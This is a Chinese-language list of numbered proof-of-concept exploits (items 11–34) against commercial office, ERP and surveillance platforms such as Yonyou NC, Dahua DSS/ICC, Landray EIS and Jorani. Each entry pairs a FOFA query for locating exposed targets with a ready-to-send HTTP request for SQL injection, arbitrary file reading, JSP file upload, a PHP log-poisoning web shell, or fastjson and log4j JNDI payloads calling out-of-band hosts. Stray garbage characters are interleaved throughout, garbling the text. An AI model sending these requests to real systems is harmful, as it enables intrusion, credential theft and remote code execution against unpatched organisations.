. d0 S3 B: I* }0 n6 m' V' T; K11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 A3 l0 P, N( q; AFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"$ G% J4 F( N+ L. h' E5 o
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.13 R6 l; `; X9 j8 r; ]* C
Host: 127.0.0.1
6 v  ]0 }' w7 _6 M/ H1 F; F' k+ WPragma: no-cache
, u! e3 e- f1 uCache-Control: no-cache
& e5 \& |0 v9 z% DUpgrade-Insecure-Requests: 1
" `) B$ c" b5 ?# C3 C; [: m& iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 K* N' |: g" W3 I1 Y6 M9 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 _+ g! V1 n, W1 |! @8 Z. K, S/ lAccept-Encoding: gzip, deflate
& W4 ^/ h. O7 a4 i7 I/ v1 `( Y: C" n' m4 dAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 g& ^; G5 O: m
Connection: close3 [1 }3 x: m$ {' N8 \
0 C" O( E) f  B/ @/ c; l
3 i& q# d+ Y' M$ \$ Y
12. Jorani < 1.0.2 远程命令执行
+ O+ w  z0 n9 Z$ G* J3 gFOFA:title="Jorani"
; R3 h+ d; g$ b! a第一步先拿到cookie
0 f* Z) Q) B  v$ N& VGET /session/login HTTP/1.1
/ N% n( J/ t* r& W! M! M) w# [+ DHost: 192.168.190.30& T7 x: `, R0 v  O* B6 p# w" x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36  x; a6 J4 j4 H  r6 c
Connection: close
. x8 N) I/ K0 ?/ ?1 \- pAccept-Encoding: gzip- L' F. c1 O- o7 ^: T5 Q

- |; B, w% Z; f5 e
/ Z. L8 c" ~' z( j2 z8 \8 ~响应中csrf_cookie_jorani用于后续请求
/ r' x6 H) ]0 kHTTP/1.1 200 OK* [% ?( N. o$ E' `- T3 X
Connection: close: k  i0 g7 v  ~% p0 I) u+ V( ]
Cache-Control: no-store, no-cache, must-revalidate0 L" I; L, s6 R5 O4 V& D* n
Content-Type: text/html; charset=UTF-82 U6 q, k# @1 Q3 A8 h& y& M9 I
Date: Tue, 24 Oct 2023 09:34:28 GMT3 `' J" s, N( N& q4 s! P& ^
Expires: Thu, 19 Nov 1981 08:52:00 GMT
  }" j3 P" p8 |+ bLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT$ F- h& o, U, O: C& z( s8 l/ h
Pragma: no-cache! {0 j" `- w8 ~+ G& \1 |
Server: Apache/2.4.54 (Debian), t2 p: o! N6 l6 @2 Q
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 ^+ |- A( W+ z# m+ Z  H
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly" A3 X$ K- f, `
Vary: Accept-Encoding' g9 N; d  n- N, R
. ?) C( R5 k* T: k& P

6 z$ b( S; G, J4 @, [POST请求,执行函数并进行base64编码
0 }& b) @" u" f0 }) [9 }5 MPOST /session/login HTTP/1.11 e: x3 s  [* \. K' E# [7 @1 x
Host: 192.168.190.30
8 Y( G5 c7 Q- j  @1 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.363 H7 ~; p6 ?( F5 u  e2 m# D
Connection: close
/ P: E, s  |' B( U; c5 vContent-Length: 252
6 |$ M" T4 }" `Content-Type: application/x-www-form-urlencoded
* B; _6 V6 Q7 c3 y! p4 YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 ~# [) _8 _0 N/ g% I6 {% RAccept-Encoding: gzip
2 D0 |4 X# i1 H& h6 v8 Q& x! X! K- H
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor+ x- X- F/ ]0 m" u0 Z' ?
( I& d, v6 l, @6 k2 G
+ D/ i% V8 j) A% V1 P. g( g

: U3 v3 W, U9 q2 g: c. Q1 y: S向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
) _) I* u2 L" q$ g# b) s( y# NGET /pages/view/log-2023-10-24 HTTP/1.1
& a1 `+ M+ w% YHost: 192.168.190.30
) T7 A6 M7 W; vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; y( g1 u+ W* U6 R9 I2 R) W' }Connection: close
1 a( L' P2 r: s6 T& P; }5 ECookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
- \) P* x+ I5 t% y$ }2 H( Z3 QK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=  r4 Y% P" O9 `) a% ?, T) i
X-REQUESTED-WITH: XMLHttpRequest* E3 g# I/ i* B- [4 i, U
Accept-Encoding: gzip
5 K9 E1 C+ Q  {3 {/ s3 X9 w. K! Z% \/ ?- A
7 y; v/ M- G2 R. o" P
13. 红帆iOffice ioFileDown任意文件读取& s4 [! D# E7 R9 t: Z
FOFA:app="红帆-ioffice"
8 f7 x7 F$ N5 \# H/ T$ `, Z7 y8 [5 R$ dGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.10 ?# d3 |% t- \! A: Z. X( q
Host: x.x.x.x
' _& _/ e4 Z' A  nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 s; }; Q1 ?% v5 C5 _% A8 Q
Connection: close
+ ]9 g1 ~% j. L: H: t. i/ ?Accept: */*; E, a- ^' [5 y$ D
Accept-Encoding: gzip& t3 E; p  s& }2 X9 K
! K; ~! @( m& F/ S

  t( {# S$ m  `' k# w14. 华夏ERP(jshERP)敏感信息泄露" t  z: e" A& @" d
FOFA:body="jshERP-boot"7 S) ^  \3 f' ^) t, q
泄露内容包括用户名密码+ o/ \' ~/ i7 c; g  |
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
8 a) w/ R  R" O: Q' GHost: x.x.x.x: n( u2 J- w# o, Z' [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 d6 U- ]' W# _1 n# T4 w
Connection: close* q3 X- w+ ^* p$ S; C
Accept: */*; |/ R" r  G* y6 \# s
Accept-Language: en
# f: g, W7 h' _( W& A" w5 ^) `0 AAccept-Encoding: gzip
; u; i6 m, c: N: W2 s- Y+ t
! Z. F. y4 h3 b$ {3 g0 u: s6 _2 I4 C7 a, _) g& q' r* ?
15. 华夏ERP getAllList信息泄露8 |- u. C9 d" y) Y* k( l
CVE-2024-0490; J  C# b1 j- r2 I) C) y' c
FOFA:body="jshERP-boot"
$ ~4 U# |  J& F  e5 p8 s泄露内容包括用户名密码! k& [. X/ Z4 r' w' G3 q
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
7 q1 B3 T- L) H9 `& g( A/ }Host: 192.168.40.130:100
6 Y7 n- {! m1 ?. I9 s  Q& s& k7 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( u' D# ^4 w4 ]" G; d1 n3 K  H
Connection: close
( K* O+ h6 O' `/ q) R9 T/ l# \+ M! H+ CAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) ^$ B4 F0 z) c8 `; `1 V. D9 x3 lAccept-Language: en2 J- y' C# W7 K" c) C
sec-ch-ua-platform: Windows
& @! C, A2 Y9 ^2 R2 U+ z9 mAccept-Encoding: gzip1 C; i* ?. f6 A2 t  ?

4 _" n& E. d7 a7 y1 N4 u; q
+ y0 F, Q- B4 K4 |/ q# w- ~9 O, c16.  红帆HFOffice医微云SQL注入
/ p! @# @9 Y3 I" lFOFA:title="HFOffice"4 w( Z# t% C" n$ X, M- X3 z
poc中调用函数计算1234的md5值
, o, n- Q2 \% }7 R4 UGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.10 i' Y/ a  z. M0 O2 o
Host: x.x.x.x
0 Z2 D/ q9 Q/ ]# f5 C' J% SUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, F4 n; q/ g0 F" h3 b2 U) @Connection: close
. b" {, f, i0 n1 w% `! jAccept: */** T! O, f+ j+ C  e) d8 L( R
Accept-Language: en
4 S: e4 ^. R6 v! q& c2 DAccept-Encoding: gzip# p. P9 i$ @6 Y  n' l. r

' Z) E  ^1 C+ v' s1 E, B9 D
9 H* U3 j9 }# D+ E' o17. 大华 DSS itcBulletin SQL 注入2 o% r& k/ O$ ~) k. G( {8 Z3 }
FOFA:app="dahua-DSS"
) s( L+ E& t* R6 t6 aPOST /portal/services/itcBulletin?wsdl HTTP/1.1# u/ B3 x! b# Y
Host: x.x.x.x
: U: \2 i2 c! A9 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, _8 x+ C4 t7 w+ ~# p6 C
Connection: close2 y9 x4 ^0 F8 K+ [  _; i
Content-Length: 3453 a9 k5 @1 r" R
Accept-Encoding: gzip+ @2 r1 _- q* J! U6 n

* w9 Y# S6 ?, ]<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
6 R$ v3 `0 h3 d6 V( ~) _<s11:Body>
$ Y' B$ I* r( P    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>8 ~# c: b( y7 G: {
      <netMarkings>
4 Z- Y# c6 H" f8 p" u+ q' v% i  Y       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1: F* U. ~4 Y! B  {
      </netMarkings>: E3 S1 H7 M5 f( Y9 l- J& U& ]9 u
    </ns1:deleteBulletin>
/ Z& Y: A) L+ T, ?3 [  </s11:Body>
8 w. C- G! r% z  l</s11:Envelope>8 K0 [. [. Q; e( }' o( P

* p+ S2 ?% ~# H9 x8 B. [# u  a
9 `6 r/ Y5 W0 @( `4 ~18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
$ C% ~( k" j4 GFOFA:app="dahua-DSS"$ R3 }8 T2 ~8 k* |
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# O, s, t, @5 A+ U3 g8 D
Host: your-ip7 B/ g% l+ U  w- x$ s8 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" R. G% U/ o7 m1 F+ `
Accept-Encoding: gzip, deflate  v2 ?$ C9 A- r
Accept: */*( ?* P. Q3 }$ t/ O
Connection: keep-alive- W& O; o* u* [. ]! M

7 N. Q0 I6 P6 v2 ]
( C% |% h, c. J( Y5 I4 w3 S5 W6 x( n1 T1 ]( p, G7 Z
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
( n' h1 P6 J2 f7 @9 qFOFA:app="dahua-DSS"
5 [4 [# ^5 E4 gGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
' {$ m2 k* V% h7 a# X/ MHost:
5 W  u6 }7 N+ ?2 Q+ ~- nUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 c- s2 u5 U; `) H( Y  IAccept-Encoding: gzip, deflate& \7 p' |' P5 x1 {" Z
Accept: */*
3 {- `6 F7 b0 M$ WConnection: keep-alive
7 o8 _# `4 u: W4 ?# [. C2 b2 n$ ?; N) ?* K9 a+ X9 U! ^, e

$ h" i$ g3 y* r7 r, U# u; l3 _20. 大华ICC智能物联综合管理平台任意文件读取$ n4 e, h) @; I! a3 @5 ^
FOFA:body="*客户端会小于800*"
; Q7 |) R+ r  y" ZGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1% ~) C3 ^* o* h
Host: x.x.x.x/ _1 |' X' \, H
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 \' }, ^& j& o0 Z7 ~- q+ K' v3 qConnection: close( C8 P5 I: Q$ ], w
Accept: */*$ w1 C% s- P5 O3 Q3 x- ^5 w* O0 U
Accept-Language: en
" K: G1 T7 j/ y1 z. ^! qAccept-Encoding: gzip
& d5 Q( p8 m) `3 y! p7 H; A2 z  M* W
  x* A& z8 h2 b+ u* G- O9 ~/ R
2 f0 |8 v/ O! [0 j% s21. 大华ICC智能物联综合管理平台random远程代码执行# q! m7 ~' U( Y% U
FOFA:icon_hash="-1935899595"
- R( d8 T" x0 T5 a0 z, D- ~9 PPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- X; t; y- s) y" E
Host: x.x.x.x5 y0 d1 P. @( J4 I# L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 ?. j2 V  _  L8 O7 ]
Content-Length: 161
0 v: j0 o9 ^3 B6 Q# N. CAccept-Encoding: gzip
/ }% g" Z4 I% z  r3 @Connection: close6 Q/ R, m6 @, x: F% Z
Content-Type: application/json;charset=utf-8  q- s: b- t! @4 r9 A% M
% y  v, w9 t2 G# A: j) l) E
{
+ e5 F% ?" s1 i- h, ?% }"a":{$ Q( S# v* |( w  `; k
   "@type":"com.alibaba.fastjson.JSONObject",
$ Z  Q/ @' X$ g. Y& l    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}9 g. }  A! m6 X( Q
  }""
& ?5 W& w* \" f  b# M6 _}) F# w* k" Y: |5 a

4 I) O4 K3 s7 O3 |- H* w0 g+ P! G: Q
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" W  |9 p; s+ pFOFA:icon_hash="-1935899595"
% N4 q# n0 |7 A5 w3 C0 NPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
3 o5 w9 y( H1 a! D* C- y& C# p6 U/ }) M+ aHost: your-ip
# U5 Z8 N0 J! V+ V, NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 r: ]4 V$ g$ `Content-Type: application/json;charset=utf-8
; S; b; {- Z: Z' f. L, p
; b. c3 S9 l6 S4 }# ]. ^) \% m3 c{
& R& G  a- l2 m# y. C"loginName":"${jndi:ldap://dnslog}"2 d: @* s0 A! K" ]3 W5 Q2 j
}: ~: y) y# s; s$ c

1 w' w( F# }. m% n% P6 y, b9 l
4 ]* l' R. J/ q2 ^( C- F- f2 T6 n& F# L, A! \
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行& D$ U% t- v7 `, {
FOFA:icon_hash="-1935899595"
6 c+ q  _. {/ GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
2 b! \7 O) r$ B0 OHost: your-ip: w# G9 m4 G  h5 z( P: Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, \4 a- N. Y+ ~$ i# GContent-Type: application/json;charset=utf-8
& ?! _$ K( k  ~2 I" b5 |Accept-Encoding: gzip; T6 ?& v  P7 R& `7 _/ Z0 o+ [% Q7 s
Connection: close
+ q, E' i2 @0 T  ?' J  A
/ M& T) O% J0 Z) p7 Y{7 k& _2 _% x0 P: o
    "a":{
% q) Y4 L. L1 n$ R+ k2 u& L$ H        "@type":"com.alibaba.fastjson.JSONObject",1 P( Q9 M3 I% U: p3 X1 o
       {"@type":"java.net.URL","val":"http://DNSLOG"}
' s8 |7 h" r8 Y6 P        }""
' @1 l* @7 `0 }0 J; M  Z}
" M0 E4 a' n3 P$ x6 R* }! _3 o* l
. G1 O/ Z) U4 A! g/ C" y2 E
24. 用友NC 6.5 accept.jsp任意文件上传
& r" L" K' i' e6 B9 NFOFA:icon_hash="1085941792"
; l! |# h$ b, u+ P, pPOST /aim/equipmap/accept.jsp HTTP/1.1
: f) r; ~* p8 K( m; f' A7 @Host: x.x.x.x  g- J8 h* E, d' M6 h" N5 O
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36$ V) L/ }1 D6 x# z: c
Connection: close
7 D4 N0 @, N' X7 F  a5 I* yContent-Length: 449. P4 a' o% M0 ^
Accept: */*
. f# V& I/ S3 O$ j& T$ HAccept-Encoding: gzip
! n% k& [# G4 Y' m2 j6 @Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 F! S. H) S. q
! M$ R2 q$ ]7 O-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! Q5 a) d) j$ ]! P0 y& s, b. c- O
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"* b6 W0 y. n$ ]( t6 H$ O9 F
Content-Type: text/plain4 A' q8 i. ?9 }  G) k
6 k+ H9 G& e0 H
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>  P( E* r8 x7 z8 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& C  v- v2 e* M6 S3 HContent-Disposition: form-data; name="fname"0 ^9 W: ^# l2 e0 X# M
0 D  S6 z6 d6 z- K4 a! L) [
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
1 G( m) b7 T+ k-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, o4 T! ?" ]) P# z
; q' J( y! o/ }
5 [7 y0 D# j. f$ _5 ^25. 用友NC registerServlet JNDI 远程代码执行
8 L  q6 S) H! J; M3 BFOFA:app="用友-UFIDA-NC"8 \, p' h, H3 T' z5 V/ S3 D+ K
POST /portal/registerServlet HTTP/1.1% Q0 [. L% U# u' ^3 S7 l5 H, l
Host: your-ip
* O$ R0 v* O# u9 h; m+ [" \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.07 A- A5 ]: ?0 ]2 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
" z  r- \- @/ E" ]Accept-Encoding: gzip, deflate' }* ^' ?6 n5 n& H# X$ E8 D
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.60 q# k  J% r: Q1 G
Content-Type: application/x-www-form-urlencoded# l' F/ R- g" A8 a4 e$ ^8 m" E, ]

9 E4 N$ D  Z0 f( S3 Q* ftype=1&dsname=ldap://dnslog& S* o; {, e( f* I9 |4 F
0 D, E: Z+ z$ z1 K; a( V9 Q

1 h2 O) ?! o& l- b, q
- q( y7 P. P; j( T6 S* h26. 用友NC linkVoucher SQL注入
, L, @$ f+ Q" Y2 }4 ^FOFA:app="用友-UFIDA-NC"4 f. q# X- j6 G+ A: ~& U8 _
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 V% o0 i8 @) f4 NHost: your-ip
: a; ^$ e8 S: C+ I* @! m3 T9 E4 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 X4 C5 d/ d7 K) |8 \! ~0 T& xContent-Type: application/x-www-form-urlencoded& s/ \; u& {/ g8 T3 ?, z- Y  q
Accept-Encoding: gzip, deflate4 X! Z4 P( J* i7 O8 l: k+ k
Accept: */*
% v  F$ @$ a  vConnection: keep-alive' A3 d) @0 l, K) ^3 p) _
8 `1 V6 T  z0 B, B5 v# G4 S

( |- C6 c$ F( D5 I9 s. m27. 用友 NC showcontent SQL注入/ V1 D/ b# E% l% a# y' w$ @
FOFA:icon_hash="1085941792"
- s, r5 `3 m! r( c* D& LGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1* j& }  G6 g7 c. }* j- |% ]
Host: your-ip. ?4 L  I6 J; h5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- ]0 v4 V! f; ?/ j; l( T4 x, N
Accept-Encoding: identity4 R- d& V* [9 K0 I, K+ r
Connection: close8 ~% v8 i! Q! A) |' P
Content-Type: text/xml; charset=utf-8
$ ?% t6 p) ?, |. n
$ Z' J9 G( Y2 G0 I9 o* w9 K
+ [, F2 p" b, M! s! [3 f  }28. 用友NC grouptemplet 任意文件上传
2 v. f% R: n! a. ?# L; sFOFA:icon_hash="1085941792"' T7 F  \& P0 J0 W- c3 E* G' M! P4 E, {3 q
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.14 E) w+ O* R' P* T7 {! \  M
Host: x.x.x.x$ j. Z5 y/ j' `' V4 g# w2 A4 Z/ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
; ]8 E* o. {: m$ ^, UConnection: close& T. ~1 m% G( G2 h
Content-Length: 268
- E8 k4 C1 Q; F- HContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk2 t0 x6 z2 e, Z2 s" ^0 H
Accept-Encoding: gzip
8 V3 S$ s$ D: Z0 s1 q. n# O7 Q- E+ S2 ^, _5 Z/ G9 @2 T: s
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk0 Q# F' Q5 U) I. G" }4 g
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"7 c1 _: C' {8 o2 g, M2 `) ~! e
Content-Type: application/octet-stream
& c# w8 c& ?- n- `) E0 z8 I  R$ t% @3 ?, X: g
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
. u+ y  n# m4 @  W/ s' ~6 h------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
$ _- K$ Y3 h; t: Y% e! x$ b3 u2 O2 M' F
( b3 {% m. N8 v
/uapim/static/pages/nc/head.jsp; j; n$ u3 a8 L; l8 q

8 ?: ~- b. Z2 w. [9 _29. 用友NC down/bill SQL注入
1 K! r8 v# u: AFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' r$ D8 i3 t5 E, A8 H. e% tGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1. x6 B' Q" P8 R  _
Host: your-ip
. W1 M: K! |- \3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ n3 p5 Z( p/ K" u& y2 m0 ^
Content-Type: application/x-www-form-urlencoded. C0 M$ t/ c  Q) [9 ]6 o8 a
Accept-Encoding: gzip, deflate
6 }) [, q- \5 Q& Y$ Y' i3 S; oAccept: */*
5 I2 j/ o0 P  Y% @* {Connection: keep-alive
, I. {; a' p6 W( y3 h" l$ }4 m$ L1 ]! j7 V8 t( X) |7 U- o
9 J4 Y' N- V0 o) _9 i  H+ V
30. 用友NC importPml SQL注入
8 ~8 x: w& a" ^9 y. F) k% rFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"( C. z6 [' k& i1 X5 h! v
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.19 @/ e+ P5 X9 _. a' V7 \4 C
Host: your-ip7 w1 `8 i2 u4 S3 H: ]7 Y- H' S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ }- W& y% y  z+ B3 \% A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
  w  k8 R0 K) P& C% \  cConnection: close
( T2 e% }2 }1 e% T+ X! X6 u% Y7 x0 v0 `4 v
------WebKitFormBoundaryH970hbttBhoCyj9V
) u  H! f+ g3 jContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 i4 s0 t4 f- m4 I2 |. U* oContent-Type: image/jpeg* U: T2 ]2 [* E. n+ P5 |
------WebKitFormBoundaryH970hbttBhoCyj9V--; l7 z" m" e+ a% k

- p2 J4 U5 z- c0 X
. T& ?* A  D7 M# n2 P31. 用友NC runStateServlet SQL注入' n) D, b4 l/ w' U" n
version<=6.5
( H+ ?* _( B/ z  h3 ~FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ ^: |$ z. v9 o; a* v7 _$ `+ t  w9 U& o
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.12 O2 F# K& @2 {5 \
Host: host$ u5 Y! W2 h" A- p5 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- P0 Y/ w+ `' @5 h3 z4 q6 P
Content-Type: application/x-www-form-urlencoded
4 S7 v% B. u9 t* i8 K( z7 n: h1 Y: @) c  U) T

, R  I4 J9 R4 k- J/ g* A7 Z32. 用友NC complainbilldetail SQL注入% l" [2 t8 S# f. F$ T9 O
version= NC633、NC65
* l0 ~0 N; b3 T( ~0 t) h5 }0 KFOFA:app="用友-UFIDA-NC"* `; ]" I" d$ n' h: K5 v) u
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.11 w: y& d; q1 C6 C
Host: your-ip9 H& }, S6 y' U' Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 ]- |0 R) @+ u: f/ a( l$ o% {) ~
Content-Type: application/x-www-form-urlencoded) ?  y+ I: j  ~7 i: C
Accept-Encoding: gzip, deflate3 z; ~3 e/ W( y; W
Accept: */*8 l7 l. x6 ]5 W, }
Connection: keep-alive5 u9 Z6 j2 R! a) j5 ?
& W! ?6 q) C9 q; F

% ~" ]9 G* f  Z& M$ F  Y/ H1 q! _33. 用友NC downTax/download SQL注入
* s9 Y8 g$ b& Dversion:NC6.5FOFA:app="用友-UFIDA-NC"2 \2 A" P1 ?8 T. a4 `: J( X
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ u" ^4 `: A) G+ C
Host: your-ip) [# s0 k( p. K3 z0 M' r- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 D2 L2 t6 j7 ?$ i5 rContent-Type: application/x-www-form-urlencoded
4 {' Y: R+ z6 MAccept-Encoding: gzip, deflate
! F: _  M' g6 b2 ^Accept: */*
. S) ~$ m% N7 w+ a( XConnection: keep-alive' s+ n! y7 C" `. [7 l2 E

* O  R) y3 S  f6 \2 E2 Z. H# k# H0 d* f6 d1 y! y2 Y
34. 用友NC warningDetailInfo接口SQL注入
2 `, q2 ^6 Z& \4 U$ YFOFA:app="用友-UFIDA-NC"$ `; F2 n, ?- X+ ]9 S8 D: c" j, b
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- e2 ^! q: Q; J8 _% u
Host: your-ip
% H: @5 i1 z: E$ f9 Y' p9 H" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; v, d) L  o2 t; Z5 k) {  U
Content-Type: application/x-www-form-urlencoded
